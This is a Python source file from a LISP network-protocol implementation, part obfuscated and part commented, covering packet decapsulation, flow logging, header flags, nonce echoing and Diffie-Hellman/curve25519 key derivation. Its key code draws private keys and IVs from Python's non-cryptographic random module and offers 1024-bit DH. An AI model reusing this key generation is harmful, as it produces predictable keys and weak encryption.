IiiiIi1iiii11 , i1I111II11 = self . decrypt ( IiiiIi1iiii11 , OoI1 , o0Oo ,
oo0o00OO )
if ( i1I111II11 == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
Iii11111I1iii = struct . unpack ( "B" , IiiiIi1iiii11 [ 0 : 1 ] ) [ 0 ]
self . inner_version = Iii11111I1iii >> 4
if ( I1111iIIiIIII and self . inner_version == 4 and Iii11111I1iii >= 0x45 ) :
ii11I = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , IiiiIi1iiii11 [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IiiiIi1iiii11 [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( IiiiIi1iiii11 [ 12 : 16 ] )
self . inner_dest . unpack_address ( IiiiIi1iiii11 [ 16 : 20 ] )
IIII1I1 = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 6 : 8 ] ) [ 0 ] )
self . inner_is_fragment = ( IIII1I1 & 0x2000 or IIII1I1 != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IiiiIi1iiii11 [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IiiiIi1iiii11 [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
elif ( I1111iIIiIIII and self . inner_version == 6 and Iii11111I1iii >= 0x60 ) :
ii11I = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 4 : 6 ] ) [ 0 ] ) + 40
OoO = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( OoO ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IiiiIi1iiii11 [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( IiiiIi1iiii11 [ 8 : 24 ] )
self . inner_dest . unpack_address ( IiiiIi1iiii11 [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IiiiIi1iiii11 [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IiiiIi1iiii11 [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
elif ( oOo0O ) :
ii11I = len ( IiiiIi1iiii11 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( IiiiIi1iiii11 [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( IiiiIi1iiii11 [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( Iii11111I1iii ) ) )
IiiiIi1iiii11 = lisp_format_packet ( IiiiIi1iiii11 [ 0 : 20 ] )
lprint ( "Packet header: {}" . format ( IiiiIi1iiii11 ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = IiIIi11i111
self . inner_dest . instance_id = IiIIi11i111
if ( lisp_nonce_echoing and is_lisp_packet ) :
oooooO0oO0o = lisp_get_echo_nonce ( self . outer_source , None )
if ( oooooO0oO0o == None ) :
O0ooo0Ooo = self . outer_source . print_address_no_iid ( )
oooooO0oO0o = lisp_echo_nonce ( O0ooo0Ooo )
if 96 - 96: IiII
o0OOO = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
oooooO0oO0o . receive_request ( lisp_ipc_socket , o0OOO )
elif ( oooooO0oO0o . request_nonce_sent ) :
oooooO0oO0o . receive_echo ( lisp_ipc_socket , o0OOO )
if 40 - 40: i11iIiiIii * II111iiii
if 57 - 57: O0 * iIii1I11I1II1 % O0 . OoooooooOO
if 53 - 53: Ii1I / I1IiiI * Ii1I + o0oOOo0O0Ooo + oO0o - Oo0Ooo
if 16 - 16: OoO0O00 % I1Ii111 . i1IIi / I1ii11iIi11i - O0
if 85 - 85: i1IIi . i1IIi
if 16 - 16: I1IiiI - OOooOOo % Ii1I . OOooOOo + I1ii11iIi11i % i11iIiiIii
if 59 - 59: i11iIiiIii - I11i
if ( i1I111II11 ) : self . packet += IiiiIi1iiii11 [ : ii11I ]
if 59 - 59: OoooooooOO * o0oOOo0O0Ooo / I1Ii111
if 75 - 75: o0oOOo0O0Ooo - OoooooooOO
if 21 - 21: I1IiiI + iIii1I11I1II1 / i11iIiiIii / oO0o
if 66 - 66: OoooooooOO + iII111i . IiII % i1IIi
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
if 58 - 58: OOooOOo % iII111i * O0 + I1ii11iIi11i - IiII
if 26 - 26: i1IIi / I1IiiI / I11i + I11i
    def swap_mac(self, mac):

        # Swap the bytes within each of the three 16-bit words of a MAC
        # address, i.e. "0011:2233:4455" becomes "1100:3322:5544".
        return (mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])

    def strip_outer_headers(self):

        # Remove the outer IP header plus the 8-byte UDP and 8-byte LISP
        # data headers that precede the inner packet.
        offset = 16
        offset += 20 if (self.outer_version == 4) else 40
        self.packet = self.packet[offset::]
        return (self)

    def hash_ports(self):

        # Fold the transport protocol and the TCP/UDP port pair into a
        # 16-bit hash value. Fragments hash on the protocol number alone.
        packet = self.packet
        version = self.inner_version
        hashval = 0
        if (version == 4):
            protocol = struct.unpack("B", packet[9])[0]
            if (self.inner_is_fragment): return (protocol)
            if (protocol in [6, 17]):
                hashval = protocol
                hashval += struct.unpack("I", packet[20:24])[0]
                hashval = (hashval >> 16) ^ (hashval & 0xffff)
        if (version == 6):
            protocol = struct.unpack("B", packet[6])[0]
            if (protocol in [6, 17]):
                hashval = protocol
                hashval += struct.unpack("I", packet[40:44])[0]
                hashval = (hashval >> 16) ^ (hashval & 0xffff)
        return (hashval)

    def hash_packet(self):

        # Hash the inner addresses and ports down to 12 bits and store the
        # result in a 0xf000-based UDP source port so ECMP paths see
        # per-flow entropy.
        hashval = self.inner_source.address ^ self.inner_dest.address
        hashval += self.hash_ports()
        if (self.inner_version == 4):
            hashval = (hashval >> 16) ^ (hashval & 0xffff)
        elif (self.inner_version == 6):
            hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
            hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
            hashval = (hashval >> 16) ^ (hashval & 0xffff)
        self.udp_sport = 0xf000 | (hashval & 0xfff)

    def print_packet(self, s_or_r, is_lisp_packet):
        if (is_lisp_packet == False):
            addresses = "{} -> {}".format(self.inner_source.print_address(),
                self.inner_dest.print_address())
            dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
                format(bold(s_or_r, False), green(addresses, False),
                self.inner_tos, self.inner_ttl, len(self.packet),
                lisp_format_packet(self.packet[0:60])))
            return

        # Summarize the direction as "encap" or "decap" for the log line.
        if (s_or_r.find("Receive") != -1):
            ed = "decap"
            ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
        else:
            ed = s_or_r
            if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
                ed = "encap"

        outer = "{} -> {}".format(self.outer_source.print_address_no_iid(),
            self.outer_dest.print_address_no_iid())

        #
        # Instance-id 0xffffff flags an encapsulated control packet, which
        # has no inner EIDs to print.
        #
        if (self.lisp_header.get_instance_id() == 0xffffff):
            line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " +
                "{}/{}, outer UDP: {} -> {}, ")
            line += bold("control-packet", False) + ": {} ..."
            dprint(line.format(bold(s_or_r, False), red(outer, False),
                self.outer_tos, self.outer_ttl, self.udp_sport,
                self.udp_dport, lisp_format_packet(self.packet[0:56])))
            return
        else:
            line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " +
                "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " +
                "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")

        if (self.lisp_header.k_bits):
            if (ed == "encap"): ed = "encrypt/encap"
            if (ed == "decap"): ed = "decap/decrypt"

        addresses = "{} -> {}".format(self.inner_source.print_address(),
            self.inner_dest.print_address())

        dprint(line.format(bold(s_or_r, False), red(outer, False),
            self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
            green(addresses, False), self.inner_tos, self.inner_ttl,
            len(self.packet), self.lisp_header.print_header(ed),
            lisp_format_packet(self.packet[0:56])))

    def print_eid_tuple(self):
        return (lisp_print_eid_tuple(self.inner_source, self.inner_dest))

    def get_raw_socket(self):

        # Return the raw socket bound to the interface that this packet's
        # instance-id maps to, if any (multi-tenancy support).
        iid = str(self.lisp_header.get_instance_id())
        if (iid == "0"): return (None)
        if (lisp_iid_to_interface.has_key(iid) == False): return (None)

        interface = lisp_iid_to_interface[iid]
        s = interface.get_socket()
        if (s == None):
            string = bold("SO_BINDTODEVICE", False)
            enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
            lprint("{} required for multi-tenancy support, {} packet".format(
                string, "drop" if enforce else "forward"))
            if (enforce): return (None)

        iid = bold(iid, False)
        device = bold(interface.device, False)
        dprint("Send packet on instance-id {} interface {}".format(iid,
            device))
        return (s)

    def log_flow(self, encap):
        global lisp_flow_log

        # Flush the in-memory flow log to disk when it fills up, or when
        # the user drops a "log-flows" file in the current directory.
        checkpoint = os.path.exists("./log-flows")
        if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or checkpoint):
            args = [lisp_flow_log]
            lisp_flow_log = []
            threading.Thread(target=lisp_write_flow_log, args=args).start()
            if (checkpoint): os.system("rm ./log-flows")
            return

        ts = datetime.datetime.now()
        lisp_flow_log.append([ts, encap, self.packet, self])

    def print_flow(self, ts, encap, packet):
        ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
        flow = "{}: {}".format(ts, "encap" if encap else "decap")

        osrc = red(self.outer_source.print_address_no_iid(), False)
        odst = red(self.outer_dest.print_address_no_iid(), False)
        isrc = green(self.inner_source.print_address(), False)
        idst = green(self.inner_dest.print_address(), False)

        if (self.lisp_header.get_instance_id() == 0xffffff):
            flow += " {}:{} -> {}:{}, LISP control message type {}\n"
            flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
                self.inner_version)
            return (flow)

        if (self.outer_dest.is_null() == False):
            flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
            flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
                len(packet), self.outer_tos, self.outer_ttl)

        #
        # Encrypted packets carry no readable inner header; log and return.
        #
        if (self.lisp_header.k_bits != 0):
            newline = "\n"
            if (self.packet_error != ""):
                newline = " ({})".format(self.packet_error) + newline
            flow += ", encrypted" + newline
            return (flow)

        #
        # Skip outer headers, if present, to reach the inner packet.
        #
        if (self.outer_dest.is_null() == False):
            packet = packet[36::] if self.outer_version == 4 else packet[56::]

        protocol = packet[9] if self.inner_version == 4 else packet[6]
        protocol = struct.unpack("B", protocol)[0]

        flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
        flow = flow.format(isrc, idst, len(packet), self.inner_tos,
            self.inner_ttl, protocol)

        #
        # Show ports for TCP/UDP and the sequence number for ICMP.
        #
        if (protocol in [6, 17]):
            ports = packet[20:24] if self.inner_version == 4 else \
                packet[40:44]
            if (len(ports) == 4):
                ports = socket.ntohl(struct.unpack("I", ports)[0])
                flow += ", ports {} -> {}".format(ports >> 16,
                    ports & 0xffff)
        elif (protocol == 1):
            seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
            if (len(seq) == 2):
                seq = socket.ntohs(struct.unpack("H", seq)[0])
                flow += ", icmp-seq {}".format(seq)

        if (self.packet_error != ""):
            flow += " ({})".format(self.packet_error)
        flow += "\n"
        return (flow)

    def is_trace(self):
        ports = [self.inner_sport, self.inner_dport]
        return (self.inner_protocol == LISP_UDP_PROTOCOL and
            LISP_TRACE_PORT in ports)

#
# Flag bits in the first 32-bit word of the LISP data-plane header
# (RFC 6830, section 5.3).
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000

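#
# Illustrative only (not in the original source): how the masks above pick
# fields out of a received first long.
#
#   first_long = LISP_N_BIT | LISP_I_BIT | (1 << 24) | 0x123456
#   bool(first_long & LISP_N_BIT)        # True, nonce present
#   bool(first_long & LISP_I_BIT)        # True, instance-id present
#   (first_long & LISP_K_BITS) >> 24     # 1, key-id of the crypto key
#   first_long & 0xffffff                # 0x123456, the 24-bit nonce
#
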
class lisp_data_header():
    def __init__(self):
        self.first_long = 0
        self.second_long = 0
        self.k_bits = 0

    def print_header(self, e_or_d):
        nonce = lisp_hex_string(self.first_long & 0xffffff)
        iid_lsb = lisp_hex_string(self.second_long).zfill(8)

        line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " +
            "iid/lsb: {}")
        return (line.format(bold(e_or_d, False),
            "N" if (self.first_long & LISP_N_BIT) else "n",
            "L" if (self.first_long & LISP_L_BIT) else "l",
            "E" if (self.first_long & LISP_E_BIT) else "e",
            "V" if (self.first_long & LISP_V_BIT) else "v",
            "I" if (self.first_long & LISP_I_BIT) else "i",
            "P" if (self.first_long & LISP_P_BIT) else "p",
            "K" if (self.k_bits in [2, 3]) else "k",
            "K" if (self.k_bits in [1, 3]) else "k",
            nonce, iid_lsb))

    def encode(self):
        packet_format = "II"
        first_long = socket.htonl(self.first_long)
        second_long = socket.htonl(self.second_long)

        header = struct.pack(packet_format, first_long, second_long)
        return (header)

    def decode(self, packet):
        packet_format = "II"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return (False)

        first_long, second_long = struct.unpack(packet_format,
            packet[:format_size])

        self.first_long = socket.ntohl(first_long)
        self.second_long = socket.ntohl(second_long)
        self.k_bits = (self.first_long & LISP_K_BITS) >> 24
        return (True)

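    # Round-trip sketch (illustrative, not in the original source): encode()
    # emits the two longs in network byte order and decode() recovers them.
    #
    #   hdr = lisp_data_header()
    #   hdr.instance_id(1000)
    #   hdr.nonce(0xabcdef)
    #   raw = hdr.encode()               # 8 bytes
    #
    #   parsed = lisp_data_header()
    #   parsed.decode(raw)
    #   parsed.get_instance_id()         # 1000
    #   parsed.get_nonce()               # 0xabcdef
    #
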
    def key_id(self, key_id):
        self.first_long &= ~(0x3 << 24)
        self.first_long |= ((key_id & 0x3) << 24)
        self.k_bits = key_id

    def nonce(self, nonce):
        self.first_long |= LISP_N_BIT
        self.first_long |= nonce

    def map_version(self, version):
        self.first_long |= LISP_V_BIT
        self.first_long |= version

    def instance_id(self, iid):
        if (iid == 0): return
        self.first_long |= LISP_I_BIT
        self.second_long &= 0xff
        self.second_long |= (iid << 8)

    def get_instance_id(self):
        return ((self.second_long >> 8) & 0xffffff)

    def locator_status_bits(self, lsbs):
        self.first_long |= LISP_L_BIT
        self.second_long &= 0xffffff00
        self.second_long |= (lsbs & 0xff)

    def is_request_nonce(self, nonce):
        return (nonce & 0x80000000)

    def request_nonce(self, nonce):
        self.first_long |= LISP_E_BIT
        self.first_long |= LISP_N_BIT
        self.first_long |= (nonce & 0xffffff)

    def is_e_bit_set(self):
        return (self.first_long & LISP_E_BIT)

    def get_nonce(self):
        return (self.first_long & 0xffffff)

class lisp_echo_nonce():
    def __init__(self, rloc_str):
        self.rloc_str = rloc_str
        self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
        self.request_nonce_sent = None
        self.echo_nonce_sent = None
        self.last_request_nonce_sent = None
        self.last_new_request_nonce_sent = None
        self.last_echo_nonce_sent = None
        self.last_new_echo_nonce_sent = None
        self.request_nonce_rcvd = None
        self.echo_nonce_rcvd = None
        self.last_request_nonce_rcvd = None
        self.last_echo_nonce_rcvd = None
        self.last_good_echo_nonce_rcvd = None
        lisp_nonce_echo_list[rloc_str] = self

    def send_ipc(self, ipc_socket, ipc):
        source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
        dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
        ipc = lisp_command_ipc(ipc, source)
        lisp_ipc(ipc, ipc_socket, dest)

    def send_request_ipc(self, ipc_socket, nonce):
        nonce = lisp_hex_string(nonce)
        ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, ipc)

    def send_echo_ipc(self, ipc_socket, nonce):
        nonce = lisp_hex_string(nonce)
        ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, ipc)

    def receive_request(self, ipc_socket, nonce):
        old_nonce = self.request_nonce_rcvd
        self.request_nonce_rcvd = nonce
        self.last_request_nonce_rcvd = lisp_get_timestamp()
        if (lisp_i_am_rtr): return
        if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)

    def receive_echo(self, ipc_socket, nonce):
        if (self.request_nonce_sent != nonce): return
        self.last_echo_nonce_rcvd = lisp_get_timestamp()
        if (self.echo_nonce_rcvd == nonce): return

        self.echo_nonce_rcvd = nonce
        if (lisp_i_am_rtr): return
        self.send_echo_ipc(ipc_socket, nonce)

    def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):

        #
        # Both sides in request-nonce mode at once is a collision; the side
        # whose RLOC address is smaller exits request-nonce mode.
        #
        if (self.request_nonce_sent and self.echo_nonce_sent and
            remote_rloc):
            local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() else \
                lisp_myrlocs[1]

            if (remote_rloc.address > local_rloc.address):
                mode = "exit"
                self.request_nonce_sent = None
            else:
                mode = "stay in"
                self.echo_nonce_sent = None

            collision = bold("collision", False)
            local_str = red(local_rloc.print_address_no_iid(), False)
            remote_str = red(remote_rloc.print_address_no_iid(), False)
            lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(
                collision, local_str, remote_str, mode))

        #
        # If we owe the peer an echo, return the saved nonce once.
        #
        if (self.echo_nonce_sent != None):
            nonce = self.echo_nonce_sent
            echo = bold("Echoing", False)
            lprint("{} nonce 0x{} to {}".format(echo,
                lisp_hex_string(nonce), red(self.rloc_str, False)))
            self.last_echo_nonce_sent = lisp_get_timestamp()
            self.echo_nonce_sent = None
            return (nonce)

        #
        # Stop request-nonce mode when the request has been outstanding
        # for a full echo interval.
        #
        nonce = self.request_nonce_sent
        last = self.last_request_nonce_sent
        if (nonce and last != None):
            if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
                self.request_nonce_sent = None
                lprint("Stop request-nonce mode for {}, nonce 0x{}".format(
                    red(self.rloc_str, False), lisp_hex_string(nonce)))
                return (None)

        #
        # Start request-nonce mode with a fresh nonce, or continue with
        # the one already outstanding. The high-order bit marks a request.
        #
        if (nonce == None):
            nonce = lisp_get_data_nonce()
            if (self.recently_requested()): return (nonce)

            self.request_nonce_sent = nonce
            lprint("Start request-nonce mode for {}, nonce 0x{}".format(
                red(self.rloc_str, False), lisp_hex_string(nonce)))
            self.last_new_request_nonce_sent = lisp_get_timestamp()

            #
            # Only the ITR tells its companion ETR process, via IPC, to
            # look for echoes; an RTR has no companion process.
            #
            if (lisp_i_am_itr == False): return (nonce | 0x80000000)
            self.send_request_ipc(ipc_socket, nonce)
        else:
            lprint("Continue request-nonce mode for {}, nonce 0x{}".format(
                red(self.rloc_str, False), lisp_hex_string(nonce)))

        self.last_request_nonce_sent = lisp_get_timestamp()
        return (nonce | 0x80000000)

    def request_nonce_timeout(self):
        if (self.request_nonce_sent == None): return (False)
        if (self.request_nonce_sent == self.echo_nonce_rcvd): return (False)

        elapsed = time.time() - self.last_request_nonce_sent
        last_echo = self.last_echo_nonce_rcvd
        return (elapsed >= LISP_NONCE_ECHO_INTERVAL and last_echo == None)

    def recently_requested(self):
        last = self.last_request_nonce_sent
        if (last == None): return (False)

        elapsed = time.time() - last
        return (elapsed <= LISP_NONCE_ECHO_INTERVAL)

    def recently_echoed(self):
        if (self.request_nonce_sent == None): return (True)

        #
        # A good echo within the echo interval keeps the RLOC up.
        #
        last = self.last_good_echo_nonce_rcvd
        if (last == None): last = 0
        elapsed = time.time() - last
        if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return (True)

        #
        # Grace period: a new request-nonce was just sent, so give the
        # peer time to echo it back.
        #
        last = self.last_new_request_nonce_sent
        if (last == None): last = 0
        elapsed = time.time() - last
        return (elapsed <= LISP_NONCE_ECHO_INTERVAL)

    def change_state(self, rloc):
        if (rloc.up_state() and self.recently_echoed() == False):
            down = bold("down", False)
            elapsed = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
            lprint("Take {} {}, last good echo: {}".format(
                red(self.rloc_str, False), down, elapsed))
            rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
            rloc.last_state_change = lisp_get_timestamp()
            return

        if (rloc.no_echoed_nonce_state() == False): return

        if (self.recently_requested() == False):
            up = bold("up", False)
            lprint("Bring {} {}, retry request-nonce mode".format(
                red(self.rloc_str, False), up))
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()

    def print_echo_nonce(self):
        req_sent = lisp_print_elapsed(self.last_request_nonce_sent)
        echo_rcvd = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
        echo_sent = lisp_print_elapsed(self.last_echo_nonce_sent)
        req_rcvd = lisp_print_elapsed(self.last_request_nonce_rcvd)
        indent = space(4)

        output = "Nonce-Echoing:\n"
        output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " +
            "received: {}\n").format(indent, req_sent, indent, echo_rcvd)
        output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " +
            "sent: {}").format(indent, req_rcvd, indent, echo_sent)
        return (output)

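    # Lifecycle sketch (illustrative; ipc_socket stands in for the real IPC
    # socket): an ITR starts request-nonce mode for an RLOC, the peer echoes
    # the nonce back in its LISP data headers, and the RLOC stays up while
    # echoes remain fresh.
    #
    #   en = lisp_echo_nonce("10.0.0.2")
    #   n = en.get_request_or_echo_nonce(ipc_socket, None)   # 0x80xxxxxx
    #   en.receive_echo(ipc_socket, n & 0xffffff)            # peer echoed
    #   en.recently_echoed()                                 # True
    #
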
class lisp_keys():

    # Diffie-Hellman / ECDH key state for lisp-crypto: one instance per
    # key-id negotiated with a remote RLOC.
    def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
        do_poly=use_poly):
        self.uptime = lisp_get_timestamp()
        self.last_rekey = None
        self.rekey_count = 0
        self.use_count = 0
        self.key_id = key_id
        self.cipher_suite = LISP_CS_1024
        self.dh_g_value = LISP_CS_1024_G
        self.dh_p_value = LISP_CS_1024_P
        self.curve25519 = None
        self.cipher_suite_string = ""
        if (do_curve):
            if (do_chacha):
                self.cipher_suite = LISP_CS_25519_CHACHA
                self.cipher_suite_string = "chacha"
            elif (os.getenv("LISP_USE_AES_GCM") != None):
                self.cipher_suite = LISP_CS_25519_GCM
                self.cipher_suite_string = "aes-gcm"
            else:
                self.cipher_suite = LISP_CS_25519_CBC
                self.cipher_suite_string = "aes-cbc"

            self.local_private_key = random.randint(0, 2 ** 128 - 1)
            key = lisp_hex_string(self.local_private_key).zfill(32)
            self.curve25519 = curve25519.Private(key)
        else:
            self.local_private_key = random.randint(0, 0x1fff)

        self.local_public_key = self.compute_public_key()
        self.remote_public_key = None
        self.shared_key = None
        self.encrypt_key = None
        self.icv_key = None
        self.icv = poly1305 if do_poly else hashlib.sha256
        self.iv = None
        self.get_iv()
        self.do_poly = do_poly

    def copy_keypair(self, key):
        self.local_private_key = key.local_private_key
        self.local_public_key = key.local_public_key
        self.curve25519 = key.curve25519

    def get_iv(self):

        # Increment the IV for each encryption and return it sized for the
        # cipher: 8 bytes for chacha20, 12 for AES-GCM, 16 for AES-CBC.
        if (self.iv == None):
            self.iv = random.randint(0, LISP_16_128_MASK)
        else:
            self.iv += 1

        iv = self.iv
        if (self.cipher_suite == LISP_CS_25519_CHACHA):
            iv = struct.pack("Q", iv & LISP_8_64_MASK)
        elif (self.cipher_suite == LISP_CS_25519_GCM):
            high = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
            low = struct.pack("Q", iv & LISP_8_64_MASK)
            iv = high + low
        else:
            iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
        return (iv)

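    # Width check (illustrative, not in the original source): the struct
    # formats used above produce exactly the IV sizes each cipher expects.
    #
    #   struct.calcsize("Q")                         # 8 bytes, chacha20
    #   struct.calcsize("I") + struct.calcsize("Q")  # 12 bytes, AES-GCM
    #   struct.calcsize("QQ")                        # 16 bytes, AES-CBC
    #
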
    def key_length(self, key):
        if (type(key) != str): key = self.normalize_pub_key(key)
        return (len(key) / 2)

    def print_key(self, key):
        out = self.normalize_pub_key(key)
        return ("0x{}...{}({})".format(out[0:4], out[-4::],
            self.key_length(out)))

    def normalize_pub_key(self, key):

        # Return the public key as a hex string: curve25519 keys arrive as
        # raw byte strings, DH keys as long integers.
        if (type(key) == str):
            if (self.curve25519): return (binascii.hexlify(key))
            return (key)
        return (lisp_hex_string(key).zfill(256))

    def print_keys(self, do_bold=True):
        local = bold("local-key: ", False) if do_bold else "local-key: "
        if (self.local_public_key == None):
            local += "none"
        else:
            local += self.print_key(self.local_public_key)

        remote = bold("remote-key: ", False) if do_bold else "remote-key: "
        if (self.remote_public_key == None):
            remote += "none"
        else:
            remote += self.print_key(self.remote_public_key)

        dh = "ECDH" if (self.curve25519) else "DH"
        cs = self.cipher_suite
        return ("{} cipher-suite: {}, {}, {}".format(dh, cs, local, remote))

    def compare_keys(self, keys):
        if (self.dh_g_value != keys.dh_g_value): return (False)
        if (self.dh_p_value != keys.dh_p_value): return (False)
        if (self.remote_public_key != keys.remote_public_key): return (False)
        return (True)

    def compute_public_key(self):
        if (self.curve25519): return (self.curve25519.get_public().public)

        # Classic Diffie-Hellman: public = g^private mod p.
        key = self.local_private_key
        g = self.dh_g_value
        p = self.dh_p_value
        return (int((g ** key) % p))

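    # Toy Diffie-Hellman walk-through (illustrative only, tiny numbers):
    # with g=5, p=23, and private keys a=6, b=15:
    #
    #   A = 5**6  % 23        # 8, local public key
    #   B = 5**15 % 23        # 19, remote public key
    #   19**6 % 23 == 8**15 % 23 == 2
    #
    # Both sides derive 2, which compute_shared_key() below then feeds into
    # the encrypt/ICV key derivation.
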
    def compute_shared_key(self, ed, print_shared=False):
        key = self.local_private_key
        remote_key = self.remote_public_key

        compute = bold("Compute {} shared-key".format(ed), False)
        lprint("{}, key-material: {}".format(compute, self.print_keys()))

        if (self.curve25519):
            public = curve25519.Public(remote_key)
            self.shared_key = self.curve25519.get_shared_key(public)
        else:
            p = self.dh_p_value
            self.shared_key = (remote_key ** key) % p

        #
        # Print the shared key only when explicitly asked; it is sensitive
        # material.
        #
        if (print_shared):
            out = self.print_key(self.shared_key)
            lprint("Computed shared-key: {}".format(out))

        #
        # Derive the data-plane encryption and integrity keys and count
        # the rekey.
        #
        self.compute_encrypt_icv_keys()
        self.rekey_count += 1
        self.last_rekey = lisp_get_timestamp()

    def compute_encrypt_icv_keys(self):
        sha = hashlib.sha256
        if (self.curve25519):
            data = self.shared_key
        else:
            data = lisp_hex_string(self.shared_key)

        #
        # The KDF context string mixes both public keys.
        #
        local = self.local_public_key
        if (type(local) != long): local = int(binascii.hexlify(local), 16)
        remote = self.remote_public_key
        if (type(remote) != long): remote = int(binascii.hexlify(remote), 16)
        context = "0001" + "lisp-crypto" + \
            lisp_hex_string(local ^ remote) + "0100"

        key_material = hmac.new(context, data, sha).hexdigest()
        key_material = int(key_material, 16)

        #
        # Split the 256 bits of key material: the upper half encrypts, the
        # lower half authenticates (ICV).
        #
        encrypt_key = (key_material >> 128) & LISP_16_128_MASK
        icv_key = key_material & LISP_16_128_MASK
        self.encrypt_key = lisp_hex_string(encrypt_key).zfill(32)
        fill = 32 if self.do_poly else 40
        self.icv_key = lisp_hex_string(icv_key).zfill(fill)

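    # KDF sketch (illustrative, standalone): one HMAC-SHA256 pass yields
    # 256 bits of key material that is split in half.
    #
    #   import hmac, hashlib
    #   material = hmac.new("context-string", "shared-secret",
    #       hashlib.sha256).hexdigest()    # 64 hex digits
    #   encrypt_key = material[0:32]       # upper 128 bits
    #   icv_key = material[32:64]          # lower 128 bits
    #
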
    def do_icv(self, packet, nonce):
        if (self.icv_key == None): return ("")
        if (self.do_poly):
            poly = self.icv.poly1305aes
            hexlify = self.icv.binascii.hexlify
            nonce = hexlify(nonce)
            hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
            hash_output = hexlify(hash_output)
        else:
            key = binascii.unhexlify(self.icv_key)
